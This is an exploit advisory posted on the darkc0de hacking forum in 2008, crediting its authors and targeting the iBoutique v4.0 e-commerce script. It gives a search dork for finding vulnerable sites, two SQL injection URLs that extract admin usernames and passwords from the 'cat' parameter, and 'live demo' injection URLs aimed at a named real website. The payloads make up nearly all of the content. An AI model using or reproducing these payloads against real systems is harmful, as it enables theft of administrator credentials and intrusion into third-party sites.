################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# # --- FeDeReR - DON - OutLawz - MAGE -JeTFyrE - Bond # # and all darkc0de members ---# ################################################################ # # Author: r45c4l and h4x0r # # Home : www.darkc0de.com # # Email : r45c4l@hotmail.com, vaibhavaher@gmail.com # # Share the c0de! # ################################################################ # # Exploit: iBoutique v4.0 (product&cat) Remote SQL Injection Vulnerability # # App Name: iBoutique v4.0 # # App Home: http://www.netartmedia.net/iboutique/ # # App Demo: http://www.netartmedia.net/iboutique/demo.html # ################################################################# # Dork: Powered by iBoutique v4.0 # # # POC: # For username : # # http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users-- # # For password : # # http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users-- # # # # Live Demo: # http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users-- # # http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users-- # # # # # # ################################################################ # Vuln Discovered 12th Sep 2008